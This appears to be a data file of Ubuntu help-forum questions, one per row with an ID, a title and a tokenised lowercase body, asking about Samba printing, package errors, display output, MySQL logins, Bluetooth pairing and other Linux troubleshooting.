448319	can not change printer name ( werr_access_denied )	i am having major problems trying to network-share a printer i have connected to my ubuntu machine ( the rest of the machines on the network are all various versions of windows ) . i 've been tangling with samba and made some progress : when trying to `` add printers '' from the windows machines , they can actually see it when doing a network search . however , windows invariably asks for a driver ( `` the server for the printer does not have the correct printer driver installed ... '' ) , and then when i select one , it delivers the error message `` windows can not connect to the printer . make sure you have typed the name correctly ... '' i 've done some research and i found that often this is due to the printer not being `` named correctly '' : using enumprinters , it has \localhost instead of the appropriate name . the suggested fix is to rename the printer using setprintername ( rpcclient ) . however , i can not do this : i always get a werr_access_denied error . additional research on rectifying that issue suggests `` granting '' oneself the appropriate privileges ( seprintoperatorprivileges , using net ... user ... rpc rights grant ) ... but i can not do that either : i receive a `` failed to privileges for [ user ] ( nt_status_access_denied ) '' message . what the heck am i missing ? any help would be appreciated , as this is a critical feature for me . thanks in advance !
448320	on ubuntu 12.04 , is there any tools to check what programs are connecting to other nfs server share ?	there are some programs running in the client , so i want to check what programs are using files or connecting to the server . to be safety , i want to check this at first before i shutdown the server . yes , i use the unmount to disconnect to the server nfsserver . but if some programs in the client is dependent on the files in the server , i think they will be get the wrong results . so i ask for help that if there exists some commands about this .
448323	wine : minor delay on sound playback	when running a game under wine pulseaudio is showing a constant delay of what i would estimate to be 100-200ms that on occasion climbs to over 500ms . i ca n't put my finger on why it increases on some instances , though . i run xubuntu 13.10 on a 1st ( or 2nd generation ? ) i7 with plenty of ram and cpu load is not high at all . all games exhibit this behaviour . have n't messed with pulseaudio 's configuration . i should also say that i have n't noticed any lag or synchronisation issues when playing video files . how can i go about diagnosing and potentially fixing this annoyance ?
448326	set scaling back to default on surface pro	i accidentally set the scaling settings at 4 , and could n't reset them . is there any way to reset these settings back to default ? i 'm running a microsoft surface pro ( 10.6 '' , 1920x1080 ) , and i can not see the slider . i have tried all the ways people posted on my previous thread and those hav n't worked . using pre-ubuntu 14.04 final beta ( beta 1 ) . so i am re-posting it because none of the answers work for me & the duplicate warning banner said to edit the question or to ask another question . yes , i have read the question i posted before and all of it 's answers , and the question it was apparently a duplicate of .
448327	how do you restore bootable flag to windows partition ?	on my dell inspiron 660 i have windows 8.1 . now , feeling as if that is not open-source enough , i often boot into ubuntu 12.04 via live usb . doing so has , somehow , turned off bootable flag for windows partition when in legacy mode . upon booting i get a no bootable device -- insert boot disk and press any key error . windows works fine and i can boot it in uefi mode . very confused , but still an advanced user . please help .
448329	what 's a .desktop file ?	i wanted to know what 's a .desktop file and how can i generate one in order to have a wine application displayed on my launcher bar on the left . now i have to open the folder where i store the executable and open it with wine , and that 's too slow . i have done some research and i saw some questions related to this already answered ( how does one create a custom application launcher for wine installed apps ? ) . they say we can generate it , but i do n't understand how thank you very much in advance ! i am a novice to linux , and i am using 12.04 .
448331	sharing music with a samba share fails between two ubuntu computers	i have two ubuntu 13.10 desktop computers on a same wlan . i have setup a samba share of the music directory of the computer 1 . i mount the music directory as a samba share in the computer 2 . i can access the mp3 files from the shared music directory and everything seems to work just fine . i can transfer files from computer 2 to computer 1 , and vice versa , over the network connection at a speed of over 1 mb/s . however , when i am at computer 2 and i try to use banshee music player to play music from the mounted samba share , it fails miserably : on most songs , the music starts to play but after 4 seconds , the music just stops . the progress indicator keeps moving but no audio . if i move the progress indicator , i get about one second of audio and then it goes mute again . with rhythmbox , i get no audio at all from the mp3 files from the samba share . the experience is similar of trying to use youtube with a bad internet connection : sometimes you get a few seconds of audio but usually not . playing the same mp3 files locally on computer 1 with banshee or rhythmbox works without any problems . i can also copy the files from computer 1 to computer 2 and play them like that , but i would like to have a single collection of music that is shared between computers . how can i do that ?
448332	ubuntu dual boot instalation instructions	i am installing ubuntu to a dual boot system i have 2 hard drives one has two partitions the other has one . i want to install ubuntu to one hard drive . when i get to the partition screen and check the hard drive i want to use , i get a popup window telling me there needs to be a root file system defined ? ? there are three small boxes below the drive selection area : change > delete > revert now in a windows setup you delete , create a partition and then format w/ a file system then install the os . change does open a new box to size the partition and other options but since i have never setup ubuntu before i am not sure what the procedure is . does anyone have the time to step me through this setup ?
448333	how to play dm2 videos on ubuntu ?	i 'm having problems on trying play `` .dm2 '' videos on ubuntu 13.10 . the only player that opens this files was smplayer , but without image and the sound is a mess ... any ideas ? !
448339	dpkg google-chrome corrupt invalid status	i ca n't get this to resolve itself , can i get some help ? setting up google-chrome-stable ( 34.0.1847.116-1 ) ... update-alternatives : error : /var/lib/dpkg/alternatives/google-chrome corrupt : invalid status dpkg : error processing google-chrome-stable ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : google-chrome-stable e : sub-process /usr/bin/dpkg returned an error code ( 1 ) still getting an error while trying to purge : $ sudo apt-get purge google-chrome-stable reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : google-chrome-stable* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 163 mb disk space will be freed . do you want to continue [ y/n ] ? ( reading database ... 505359 files and directories currently installed . ) removing google-chrome-stable ... update-alternatives : using /usr/bin/firefox to provide /usr/bin/x-www-browser ( x-www browser ) in auto mode . update-alternatives : using /usr/bin/firefox to provide /usr/bin/gnome-www-browser ( gnome-www-browser ) in auto mode . update-alternatives : error : /var/lib/dpkg/alternatives/google-chrome corrupt : invalid status dpkg : error processing google-chrome-stable ( -- purge ) : subprocess installed pre-removal script returned error exit status 2 update-alternatives : using /usr/bin/google-chrome-stable to provide /usr/bin/x-www-browser ( x-www-browser ) in auto mode . update-alternatives : using /usr/bin/google-chrome-stable to provide /usr/bin/gnome-www-browser ( gnome-www-browser ) in auto mode . update-alternatives : error : /var/lib/dpkg/alternatives/google-chrome corrupt : invalid status dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : google-chrome-stable e : sub-process /usr/bin/dpkg returned an error code ( 1 ) : ~ $
448340	how to fix matlab r2014 greek letter/latex font support	i am using matlab r2014a under ubuntu 12.04 . using tex markup such as \alpha , etc in text objects renders regular ascii characters and not the expected tex output . making a symbolic link from the matlab font folder to the system font folder ( as described here ) did not help . google has lots of complicated solutions to similar but more difficult problems with matlab/latex support . how can i get basic greek letter support in text objects ?
448341	ubuntu 13.10 to lg tv via hdmi	i am unable to connect a ubuntu 13.10 box to a 55 lg led 1080p 240 hz smart tv ( model # 55las400 ) via hdmi . sometimes i just get a green screen on the tv or other times it wo n't recognize the tv at all . connecting to a asus monitor via hdmi or vga works no problem , so i know the cable is ok . i am using a ati radeon 5450 hd graphics card and this problems occurs with both the open source x.org and fglrx catalyst drivers . the hdmi page on the ubuntu wiki discusses that the tv hdmi modelines are faulty . i tried the dvi approach : if your television has a separate dvi port , you can try connecting to that ( try replacing the hdmi- > hdmi cable with an hdmi- > dvi cable , with the dvi end hooked to the tv , and hdmi on the computer ) . if you're able to get a valid signal there , take note of its modeline and try that with the hdmi- > hdmi connection . over dvi , the tv sometimes will report a non-interlaced native resolution the video driver can handle . this is the output of ''xrandr -- verbose '' when both the hdmi ( hdmi-0 ) and vga ( vga-0 ) are hooked up to the lg tv but having the tv use the vga input . in this configuration , the tv does not even recognize the hdmi input , however ubuntu recognizes that hdmi-0 is connected . steambox @ steambox-ms-7786 : ~ $ xrandr -- verbose screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 hdmi-0 connected ( normal left inverted right x axis y axis ) identifier : 0x53 timestamp : 3054999 subpixel : horizontal rgb clones : crtcs : 0 1 2 3 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : edid : 00ffffffffffff001e6d010001010101 0116010380a05a780aee91a3544c9926 0f5054a1080031404540614071408180 010101010101023a801871382d40582c 4500a05a0000001e662150b051001b30 40703600a05a0000001e000000fd003a 3e1e5310000a202020202020000000fc 004c472054560a202020202020200143 02032ef1489022200504030201230957 0778030c004000802d20c00e014f00fe 08100610181028103810e3050301023a 801871382d40582c4500a05a0000001e 011d8018711c1620582c2500a05a0000 009e011d007251d01e206e285500a05a 0000001e263680a070381f4030202500 a05a0000001a00000000000000000034 underscan vborder : 0 range : ( 0 , 128 ) underscan hborder : 0 range : ( 0 , 128 ) underscan : off supported : offonauto coherent : 1 range : ( 0 , 1 ) 1920x1080 ( 0x57 ) 148.5mhz +hsync +vsync +preferred h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz 1920x1080 ( 0x59 ) 148.4mhz +hsync +vsync h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.4khz v : height 1080 start 1084 end 1089 total 1125 clock 59.9hz 1920x1080 ( 0x2ed ) 138.6mhz +hsync -vsync h : width 1920 start 1968 end 2000 total 2080 skew 0 clock 66.6khz v : height 1080 start 1082 end 1087 total 1111 clock 60.0hz 1920x1080i ( 0x5a ) 74.2mhz +hsync +vsync interlace h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 33.8khz v : height 1080 start 1084 end 1094 total 1125 clock 60.1hz 1920x1080 ( 0x2ee ) 74.2mhz +hsync +vsync h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 33.8khz v : height 1080 start 1084 end 1089 total 1125 clock 30.0hz 1920x1080 ( 0x2ef ) 74.2mhz +hsync +vsync h : width 1920 start 2558 end 2602 total 2750 skew 0 clock 27.0khz v : height 1080 start 1084 end 1089 total 1125 clock 24.0hz 1920x1080i ( 0x5c ) 74.2mhz +hsync +vsync interlace h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 33.7khz v : height 1080 start 1084 end 1094 total 1125 clock 60.0hz 1920x1080 ( 0x2f0 ) 74.2mhz +hsync +vsync h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 33.7khz v : height 1080 start 1084 end 1089 total 1125 clock 30.0hz 1920x1080 ( 0x2f1 ) 74.2mhz +hsync +vsync h : width 1920 start 2558 end 2602 total 2750 skew 0 clock 27.0khz v : height 1080 start 1084 end 1089 total 1125 clock 24.0hz 1280x1024 ( 0x5f ) 108.0mhz +hsync +vsync h : width 1280 start 1328 end 1440 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1360x768 ( 0x2f2 ) 85.5mhz +hsync +vsync h : width 1360 start 1424 end 1536 total 1792 skew 0 clock 47.7khz v : height 768 start 771 end 777 total 795 clock 60.0hz 1152x864 ( 0x2f3 ) 81.6mhz -hsync +vsync h : width 1152 start 1216 end 1336 total 1520 skew 0 clock 53.7khz v : height 864 start 865 end 868 total 895 clock 60.0hz 1280x720 ( 0x64 ) 74.2mhz +hsync +vsync h : width 1280 start 1390 end 1430 total 1650 skew 0 clock 45.0khz v : height 720 start 725 end 730 total 750 clock 60.0hz 1280x720 ( 0x66 ) 74.2mhz +hsync +vsync h : width 1280 start 1390 end 1430 total 1650 skew 0 clock 45.0khz v : height 720 start 725 end 730 total 750 clock 59.9hz 1024x768 ( 0x6a ) 65.0mhz -hsync -vsync h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x70 ) 40.0mhz +hsync +vsync h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 720x480 ( 0x73 ) 27.0mhz -hsync -vsync h : width 720 start 736 end 798 total 858 skew 0 clock 31.5khz v : height 480 start 489 end 495 total 525 clock 60.0hz 720x480 ( 0x74 ) 27.0mhz -hsync -vsync h : width 720 start 736 end 798 total 858 skew 0 clock 31.5khz v : height 480 start 489 end 495 total 525 clock 59.9hz 640x480 ( 0x77 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 60.0hz 640x480 ( 0x2f4 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 489 end 492 total 525 clock 59.9hz 640x480 ( 0x78 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz 720x400 ( 0x79 ) 28.3mhz -hsync +vsync h : width 720 start 738 end 846 total 900 skew 0 clock 31.5khz v : height 400 start 412 end 414 total 449 clock 70.1hz dvi-0 disconnected ( normal left inverted right x axis y axis ) identifier : 0x54 timestamp : 3054999 subpixel : horizontal rgb clones : crtcs : 0 1 2 3 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : load detection : 1 range : ( 0 , 1 ) underscan vborder : 0 range : ( 0 , 128 ) underscan hborder : 0 range : ( 0 , 128 ) underscan : off supported : offonauto coherent : 1 range : ( 0 , 1 ) vga-0 connected 1920x1080+0+0 ( 0x57 ) normal ( normal left inverted right x axis y axis ) 160mm x 90mm identifier : 0x55 timestamp : 3054999 subpixel : no subpixels gamma : 1.0:1.0:1.0 brightness : 1.0 clones : crtc : 0 crtcs : 0 1 2 3 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : edid : 00ffffffffffff001e6d010001010101 0116010368a05a780aee91a3544c9926 0f5054a1080031404540614071408180 010101010101023a801871382d40582c 4500a05a0000001e662150b051001b30 40703600a05a0000001e000000fd003a 3e1e5310000a202020202020000000fc 004c472054560a20202020202020005c load detection : 1 range : ( 0 , 1 ) 1920x1080 ( 0x57 ) 148.5mhz +hsync +vsync *current +preferred h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz 1280x1024 ( 0x5f ) 108.0mhz +hsync +vsync h : width 1280 start 1328 end 1440 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1360x768 ( 0x2f2 ) 85.5mhz +hsync +vsync h : width 1360 start 1424 end 1536 total 1792 skew 0 clock 47.7khz v : height 768 start 771 end 777 total 795 clock 60.0hz 1152x864 ( 0x2f3 ) 81.6mhz -hsync +vsync h : width 1152 start 1216 end 1336 total 1520 skew 0 clock 53.7khz v : height 864 start 865 end 868 total 895 clock 60.0hz 1024x768 ( 0x6a ) 65.0mhz -hsync -vsync h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x70 ) 40.0mhz +hsync +vsync h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 640x480 ( 0x77 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 60.0hz 640x480 ( 0x2f4 ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 489 end 492 total 525 clock 59.9hz 720x400 ( 0x79 ) 28.3mhz -hsync +vsync h : width 720 start 738 end 846 total 900 skew 0 clock 31.5khz v : height 400 start 412 end 414 total 449 clock 70.1hz steambox @ steambox-ms-7786 : ~ $
448342	can conky be on top of a fullscreen window ?	i run ubuntu 13.10 with cinnamon as the window manager . i like to play my games in fullscreen when i can , but i also would like to see the system cpu/mem usage as well . i do n't want to use a gl-ingect ( having to choose between mumble-overlay , steam-overlay and simplescreenrecorder is already a chore ! ) , so conky appears to be the best option , without any manual c coding . can i have conky over absolutely everything ( on cinnamon 2.0 ) ?
448344	como instalo ubuntu en una pc que tiene lubuntu	i want to install ubuntu on my computer which has lubuntu . how can i remove lubuntu and install ubuntu . thanks . hola la verdad soy nuevo utilizando linux y no se como hacerlo pues yo quiero instalar ubuntu en mi ordenador pero tengo instalado el lubuntu como le puedo hacer para eliminar lubuntu y poner ubuntu bueno espero y me puedan responder gracias .
448349	application require administrator authentication	i have installed wine simulator in my ubuntu 12.04 lts . and i have 2 users on my machine administrator user ( administrator account ) net user ( standard account ) now both user able to install windows application in ubuntu but i want that only administrator can do that . and when net user access the wine application then it requires authentication of administrator user . how can i do that ?
448350	why `dpkg -s /var/lib/dpkg` shows `` base-files , dpkg '' ?	i 'm curious to know which package provides the /var/lib/dpkg directory , so i run this command $ dpkg -s /var/lib/dpkg base-files , dpkg : /var/lib/dpkg the resulted output displays the package which provides /var/lib/dpkg along with base-files string like the above . $ dpkg -s /var/lib/aptitude aptitude : /var/lib/aptitude $ dpkg -s /var/lib/apt apt : /var/lib/apt but i did n't see any base-files string on the above output . ofcourse files inside /var/lib/apt directory is also essential for an ubuntu system to run . so why dpkg -s /var/lib/dpkg command shows `` base-files , '' string ? why it is n't displayed on the others ?
448351	ca n't login to ubuntu server after create cron and change samba log	please help ! yesterday , i create a cron which copy file to a thumb drive every 6 pm , and after that , i modified /etc/rsyslog.d/50-default.conf and smb.conf to change logging method for samba and today i ca n't login to my server , when i login correctly , the server return back to the login question.. i tried to login via ssh and webmin but still ca n't log me in i 've tried the recovery mode , and i can login as root . but i ca n't change anything since all the file is read only.. what must i do ? ?
448356	standard user can change the date and time	i am using ubuntu 12.04 lts edition . and now i want that i give full right to my standard user to change the time and date accordingly . in my system after shutting down the system for a 4-5 hrs reset the time of my system. ? i set the time manually by gui interface from the administrator account . i set utc=no in rs5 configuration file . but problem is same . any idea to give the privileges to the normal user to change the date n time ?
448357	i am having a problem downloading the ubuntu software from the web site ?	i am currently using windows vista professional . when i go to the ubuntu web site and start a download of version 12 i get a dvd error message that the download has not completed . what can i do to obtain the ubuntu software ? i would like to change my o/s to ubuntu .
448358	automating apt-get install with -- assume-yes	i am trying to write a bash script to install a list of software . i am using -- assume-yes to get pass the prompts this following line somehow does n't work sudo apt-get install python-software-properties -- assume-yes if i try to apt-get without -- assume-yes it works but the prompt ask to please [ enter ] to continue or ctrl+c to cancel adding it how do i add [ enter ] command when apt-get install instead of -- assume-yes ?
448359	should i update ubuntu 12.04 iso image to 14.04 iso image using zsync ?	can i do this by just renaming the previous iso ? or what ?
448363	where i can i find an image 11.04 ?	i am running a older toughbook cf 29 and had i think 11.04 . i tried to upgrade to 12.04 but it did n't take . so i am looking for a stable image . could some one point me in the right direction ? i would take older images too .
448364	installing amd catalyst 14.3 on ubuntu 13.10-64bit	i have followed these instructions : http : //wiki.cchtml.com/index.php/ubuntu_saucy_installation_guide # generate_a_new_.2fetc.2fx11.2fxorg.conf_file i have not performed section 3.5 generate a new /etc/x11/xorg.conf file . is it necessary to create a xorg.conf file if all of section 3.7 , test your installation , checks out fine ? i do not have any issues or hangs when running the fgl_glxgears test , but i do experience hangs randomly while playing dayz and intermittently upon trying to exit dayz to the lobby . thanks for any and all suggestions in advance .
448373	use system environment variable for snort.conf home_net setting	i 'm setting up a mass deployment image that includes snort . since i do n't know the network address range that each image will reside on i thought about using an environment variable to hold the network range and use this environment variable in the snort.conf file to set home_net . but that 's where everything falls apart . can this be done ? how ? essentially , i 'm envisioning something like : $ export sys_home_net=192.168.1.0/16 # snort.conf ipvar home_net % sys_home_net % obviously , this does n't work . any ideas ?
448374	how to setup thunderbird email client 12.04 lts ?	i want to setup and use thunderbird . currently , i use microsoft 's outlook mail . i do n't know the pop or imap of outlook to setup thunderbird , and to push mail from outlook to thunderbird . is it possible to setup and use thunderbird , exclusively , without outlook ? it would be nice to directly receive email to thunderbird if it 's possible . does ubuntu provide pop or imap servers for thunderbird ? robert
448376	anywhere to download wine for xubuntu ?	i am completely new to the linux world and am already having troubles . i installed xubuntu on an old desktop and am trying to set up a usb wifi adapter to get some internet connection on the thing . i need wine to run the setup software for the adapter , but it seems the only way to get it is to have an internet connection ! i 'm stuck and ca n't make any sense of the limited information i have found by searching the internet so far . would it be easier to just install a different os that comes with wine already ? your help and patience with me is much appreciated ! ! info from lsusb : bus 001 device 004 : id 0846:9020 netgear , inc. wna3100 ( v1 ) wireless-n 300 [ broadcom bcm43231 ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 046d : c534 logitech , inc . bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
448381	mumble-server i386 depends on libqt4-core and libssl0.9.8	i am trying to use apt-get and i get this error . it also doesnt allow me to install devs . root @ ubuntu : ~ # sudo apt-get install mumble reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : mumble : depends : libasound2 ( > = 1.0.23 ) depends : libavahi-compat-libdnssd1 ( > = 0.6.16 ) but it is not going to be installed depends : libg15daemon-client1 but it is not going to be installed depends : libprotobuf7 but it is not going to be installed depends : libpulse0 ( > = 1:0.99.1 ) but it is not going to be installed depends : libqt4-network ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-sql ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-svg ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but it is not going to be installed depends : libsndfile1 ( > = 1.0.20 ) but it is not going to be installed depends : libspeechd2 ( > = 0.7.1 ) but it is not going to be installed depends : libspeex1 ( > = 1.2~beta3-1 ) but it is not going to be installed depends : libspeexdsp1 ( > = 1.2~beta3.2-1 ) but it is not going to be installed depends : gconf2 ( > = 2.28.1-2 ) depends : libqt4-sql-sqlite but it is not going to be installed recommends : speech-dispatcher but it is not going to be installed mumble-server : i386 : depends : libqt4-core : i386 ( > = 4.3.2 ) but it is not going to be installed depends : libssl0.9.8 : i386 ( > = 0.9.8e-1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ ubuntu : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : mumble-server : i386 suggested packages : mumble-server-web : i386 mumble-django : i386 the following packages will be upgraded : mumble-server : i386 1 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . 1 not fully installed or removed . need to get 0 b/958 kb of archives . after this operation , 2,109 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of mumble-server : i386 : mumble-server : i386 depends on libqt4-core ( > = 4.3.2 ) . mumble-server : i386 depends on libssl0.9.8 ( > = 0.9.8e-1 ) . dpkg : error processing mumble-server : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : mumble-server : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
448385	error running ubuntu emulator	i 'm getting the following error when i try to run ubuntu emulator , begin : running /scripts/init-bottom ... done . [ 10.407868 ] init : ureadahead main process ( 399 ) terminated with status 5 i even tried to install the ubuntu touch x86 emulator but i get the same error . i am using ubuntu 12.04 .
448388	wget does not fetch file from link	i am typing the command wget http : //bookfi.org/dl/1029034/ad9e54 in bash and i do n't get the file , instead i get an html page . if i give the same link to freedownloadmanager , it does fetch the file . why is this behaviour ? can curl fetch me the file ?
448395	is there a man page for php pear from php-pear package ?	i 'm searching for man page documentation or alternatives for the php-pear package on ubtunu 13.10 . concretely i 'm stuck with the following issues ( besides not finding the man page where i believe to find answers to the following questions myself , so please consider answering them right here or sharing links to resources other than the man page ) : how to react to output did not download optional dependencies : pear/system_command , use -- alldeps to download automatically ( there seems to be no -- alldeps argument ; tried all kind of combinations ) ? where are config files of pear on ubuntu ? i 'm looking for the cache directory .
448397	show the history of removable devices in linux	i just wanted to see the history of all the removable devices ( pendrives , etc ) if any plugged into my system . just like the history command which tells the history of commands executed on terminal , is there any command which can tell the history of the removable devices ? i hope the question is clear .
448404	error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes )	i know that some users may say that this is a duplication but seriously i have combed the answers and those on the internet for over half a day and i am so frustrated i am going to explode . now that therapeutic explanation is done , i have installed mysql server and mariadb 10 from the ubuntu repositories on ubuntu 12.04 lts and input the root password when it is installing [ when the pink screen appears and prompts for the root password ] and the installation goes through as smoothly as a knife through butter . now the real frustration begins in either of the below 2 scenarios : when i enter the sudo /usr/bin/mysql_secure_installation command nd am prompted to enter the root password or 2.when i enter the mysql -u root -p command and am prompted for the password . please i really need help on this - i have lost count of the number of times i have had to uninstall and reinstall either mysql or mariadb because this pain in neck erf an error .
448405	saving to data partition , but eating into c : \	i 've been saving gimp files to my separate d : partition but i am getting low disk space warnings for c : and have just received notice for a libreoffice document which i am also running off the separate data partition . the partition has 43gb space left , whilst my c : \ is whittled away now to 40mb of free space ! i have a libreoffice file currently open which reads : '' libreoffice could not save important internal information due to insufficient free disk space at the following location : /home/jonno/.config/libreoffice/3/user/backup you will not be able to continue working with libreoffice without allocating more free disk space at that location . '' how can i free up space on my c : and ensure that saving to d : will not affect c : space ?
448406	ca n't access any of the partition using ubuntu 13.10	when i click on any partition this message appear error mounting /dev/sda8 at /media/neo/programs : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda8 '' `` /media/neo/programs '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda8 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . thanks in advance
448411	running programms on ubuntu	i am new on ubuntu and i have a lot of software like itunes , canon image and printer software which have been installed under microsoft . do i have to reinstall them on ubuntu ? or can i run them via ubuntu ? thank you in advance ( even if it may seem like a naive question ) ronmylo
448412	can not connect hc-05 bluetooth module in ubuntu 13.04	i am trying to pair my hc-05 arduino bluetooth module with my ubuntu machine for the past couple of hours but with no success . i ran the following commands : sdptool add -- channel=1 sp hcitool scan sudo rfcomm bind rfcomm0 < mac address of the hco5 module > but then if i try to connect issuing the following command : sudo rfcomm connect 0 i get the error : ca n't connect rfcomm socket : connection refused i have also edited the /etc/bluetooth/rfcomm.conf file to this : # # rfcomm configuration file . # rfcomm0 { # # automatically bind the device at startup bind yes ; # # # bluetooth address of the device device 20:14:02:17:17:38 ; # # # rfcomm channel for the connection channel 1 ; # # # description of the connection comment `` arduino bluetooth module '' ; } but i always keep getting the connection refused error . i also tried pairing with the module from the bluetooth manager applet . the default pin is 1234 and i have successfully connected with my bluetooth module through my android phone . but here , i see the hc-05 module listed as unknown and therefore when i try to connect with the default pin , the bluetooth manager generates a random pin and asks me to enter that pin on the other device to complete the pairing request which i can not do obviously . when i try rfcomm connect i am not presented with a pairing request window where i can just punch in the pin like i did in my android phone . i read the blogs and the bluetooth module can be connected to linux machines so i am sure i am missing something simple . any help is appreciated .
448420	download manager , app store	first of all forgive me , as i have very little knowledge about computers . i have two questions : why does n't ubuntu have a download manager installed by default ? why are so many commonly used applications like opera browser , or variety wallpaper changers , or many other stuff not present in the ubuntu app store , athough they are supported by ubuntu ?
448422	mouse `` jumps '' while holding a mousebutton	i am very new to ubuntu ( 13.10 ) . i 've just installed it yesterday and have some problems with my mouse . while holding a mousebutton it jumps all over the screen but holding a '' mousebutton '' using the trackpad ( sorry i forgot to mention that i am on a laptop ) i do n't have any problems and everything works fine and smooth . i checked the controll but there is no option that might fix my problem . is anyone able to help me ?
448424	unable to open php files on linux platform on ubuntu	i 've copied over my files over to a new directory which i have created : /var/www/worm/data.php . i tried opening it by a few ways : double clicking the file but nothing comes out typing localhost/worm/data.php into search browser , but nothing comes out either . can someone please guide or tell me what can i do ?
448425	desktop wallpaper changer	after updating to ubuntu 13-10 on both my dell inspiron desktop as well as samsung netbook , the desktop wallpaper changer /appearance settings vanished from my ubuntus.was the support removed.although wallpapers can be changed by opening an image the appearence settings vanished.when i put 13.04 on my desktop again , it reappeared ! whats wrong with my operations ?
448428	openssl is either not installed properly or link to it is not working	typing openssl version comes up with the following : the program 'openssl ' is currently not installed . you can install it by typing : sudo apt-get install openssl typing sudo apt-get install openssl suggests it 's already installed : ~ $ sudo apt-get install openssl [ sudo ] password for systemagic : reading package lists ... done building dependency tree reading state information ... done openssl is already the newest version.. 0 to upgrade , 0 to newly install , 0 to remove and 6 not to upgrade . trying to locate it - i can see there is a file in ./usr/bin/openssl / $ sudo find -name `` openssl '' ./etc/apparmor.d/abstractions/openssl ./etc/bash_completion.d/openssl ./usr/bin/openssl ./usr/share/doc/openssl navigating to this directory it shows openssl as an archive file ( red ) . please can you help get the command line working . the server has been patched and rebooted . running ubuntu 12.04.4 lts and the following are present : ii libflac8 : i386 1.2.1-6 free lossless audio codec - runtime c library ii libio-socket-ssl-perl 1.53-1 perl module implementing object oriented interface to ssl sockets ii libnet-ssleay-perl 1.42-1build1 perl module for secure sockets layer ( ssl ) ii libssl0.9.8 : i386 0.9.8o-7ubuntu3.1 ssl shared libraries ii libssl1.0.0 1.0.1-4ubuntu5.12 ssl shared libraries ii libssl1.0.0 : i386 1.0.1-4ubuntu5.12 ssl shared libraries ii libwavpack1 : i386 4.60.1-2 audio codec ( lossy and lossless ) - library ii openssl 1.0.1-4ubuntu5.12 secure socket layer ( ssl ) binary and related cryptographic tools ii python-openssl 0.12-1ubuntu2.1 python wrapper around the openssl library ii ssl-cert 1.0.28ubuntu0.1 simple debconf wrapper for openssl
448430	how to add package source to ubuntu package list	i develop a new open source named easycwmp and i want to add it to ubuntu packages list . how to proceed ?
